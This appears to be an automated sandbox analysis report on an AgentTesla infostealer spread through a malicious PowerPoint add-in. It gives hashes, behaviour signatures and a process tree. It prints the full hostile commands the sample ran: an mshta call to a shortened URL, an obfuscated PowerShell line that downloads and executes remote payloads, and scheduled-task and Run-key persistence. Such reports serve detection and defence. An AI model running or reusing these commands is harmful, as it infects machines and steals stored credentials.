Analysis
-
max time kernel
126s -
max time network
142s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
18-10-2021 09:32
Static task
static1
Behavioral task
behavioral1
Sample
M0120211002081457786750.ppam
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
M0120211002081457786750.ppam
Resource
win10-en-20211014
General
-
Target
M0120211002081457786750.ppam
-
Size
11KB
-
MD5
6dcc9d21ef2edc9fd781ff822bd084d9
-
SHA1
6f06878c124458c4c470c271f403a996cc695bf1
-
SHA256
33f4029423a3f52c376e6335e41d1ac4fccc9eff56aa29942cda968def3834c4
-
SHA512
61a30c98be6af40ce7cc606ce0a864a1e3fece6cdd10f25af6e2bceebd3b240f4b73d22e9e9b0d27d1872747831ebeca97aa0dd1c4ffa3f9181ed0fdceb2c615
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1944 2472 mshta.exe POWERPNT.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2508-331-0x000000000043752E-mapping.dmp family_agenttesla behavioral2/memory/2196-398-0x000000000043752E-mapping.dmp family_agenttesla behavioral2/memory/2196-404-0x0000000005700000-0x0000000005BFE000-memory.dmp family_agenttesla -
Blocklisted process makes network request 13 IoCs
Processes:
mshta.exepowershell.exeflow pid process 41 1944 mshta.exe 43 1944 mshta.exe 45 1944 mshta.exe 47 1944 mshta.exe 49 1944 mshta.exe 50 1944 mshta.exe 52 1944 mshta.exe 54 1944 mshta.exe 55 1944 mshta.exe 57 1944 mshta.exe 60 1944 mshta.exe 61 1944 mshta.exe 63 568 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_9ced8c4882bf438794323650cefdf10a.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d3e937b03944ed6970ddcdfb041998e.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 568 set thread context of 2508 568 powershell.exe jsc.exe PID 568 set thread context of 2196 568 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3096 taskkill.exe 1260 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2472 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 1424 dw20.exe 1424 dw20.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe 2508 jsc.exe 2508 jsc.exe 2196 RegAsm.exe 2196 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 2196 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1260 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 2508 jsc.exe Token: SeDebugPrivilege 2196 RegAsm.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 2472 POWERPNT.EXE 2508 jsc.exe 2196 RegAsm.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 2472 wrote to memory of 1944 2472 POWERPNT.EXE mshta.exe PID 2472 wrote to memory of 1944 2472 POWERPNT.EXE mshta.exe PID 1944 wrote to memory of 1260 1944 mshta.exe taskkill.exe PID 1944 wrote to memory of 1260 1944 mshta.exe taskkill.exe PID 1944 wrote to memory of 3096 1944 mshta.exe taskkill.exe PID 1944 wrote to memory of 3096 1944 mshta.exe taskkill.exe PID 1944 wrote to memory of 568 1944 mshta.exe powershell.exe PID 1944 wrote to memory of 568 1944 mshta.exe powershell.exe PID 1944 wrote to memory of 1364 1944 mshta.exe schtasks.exe PID 1944 wrote to memory of 1364 1944 mshta.exe schtasks.exe PID 1944 wrote to memory of 1424 1944 mshta.exe dw20.exe PID 1944 wrote to memory of 1424 1944 mshta.exe dw20.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 2508 568 powershell.exe jsc.exe PID 568 wrote to memory of 1876 568 powershell.exe csc.exe PID 568 wrote to memory of 1876 568 powershell.exe csc.exe PID 1876 wrote to memory of 2472 1876 csc.exe cvtres.exe PID 1876 wrote to memory of 2472 1876 csc.exe cvtres.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe PID 568 wrote to memory of 2196 568 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\M0120211002081457786750.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksoodwdasdwmdaweu2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3096 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/9.html\""3⤵
- Creates scheduled task(s)
PID:1364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_9ced8c4882bf438794323650cefdf10a.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d3e937b03944ed6970ddcdfb041998e.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2508 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzdukger\zzdukger.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D43.tmp" "c:\Users\Admin\AppData\Local\Temp\zzdukger\CSCAB4B0787B16A470BA4B6D54044CF4285.TMP"5⤵PID:2472
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:2196 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29803⤵
- Suspicious behavior: EnumeratesProcesses
PID:1424
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
bcaca9e5a8748f0773cdb0bf1b13a746
SHA1939482296c7fb48750089dbfbc7beb6ab6393125
SHA256462dd360f9e62506c20405436cb37ce4748a2df0c7b035237f3cc6727fcdeb1e
SHA512bc323196abbd1dfd3cf95098c6d5e08865464e48f116fedf1cbd6aee47ab401828a6a2770dcf760b5b558720892579a2e189a12d96f193d5f63796afca263002
-
MD5
e4ada96b69b7961c6f8c6eeba5cd1ea6
SHA17d1e2791b68c16fd92b331605c4fbf8b7d5c2fc5
SHA256e5e417f9599de88da2e4aa274f6ab39eb661f9ff01f68805cb7d56f8523a23d1
SHA51246635b580efe714f84222c2dbd48516e4d7ec2906ea88138e113c3429ecb95f9b8bd24d201339965b3caa218f0f17f468f3b14838b3d4245d9d0c751d3723f28
-
MD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
MD5
0d9b2e1a652efe65d397d4ce054730ee
SHA16f4466d464a97caa600addd8b62f95dccedcf15b
SHA2566676cb4fd7135e5f3641753e50c13d1d07722931e0ca1eefa2bb741f3349bd23
SHA5123d3bd768c35a851e5a520fc3e1e562d5e6585c4535e9c8e534dc339786b3ab8d515eeb906eecc4e6cecd043c4edd0fe1bf955d9305513dea11312f71c2a3ca24
-
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
MD5
1b7bec0c803dd759d2672ca19a3bb4f8
SHA1383afe75356d04b79dc90d5e80cb005fa6064f4a
SHA2564bbc906b70cc31c065f62ee1872eef1ed85ce3814c60b33ef4e4d2baed731f91
SHA5123319f9855477a64cea1ef59067683b61144f64ad84036000220710ea2da87eca083fbae844f13ec76b503b078a97de7e3eee790142bda712d64afb6b1088301b